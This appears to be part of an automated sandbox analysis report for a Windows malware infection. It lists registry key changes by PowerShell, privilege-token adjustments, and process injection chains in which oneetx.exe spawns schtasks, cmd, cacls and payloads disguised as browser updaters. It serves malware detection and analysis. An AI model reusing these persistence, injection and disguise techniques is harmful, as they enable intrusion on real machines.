Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\netsh.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\schtasks.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
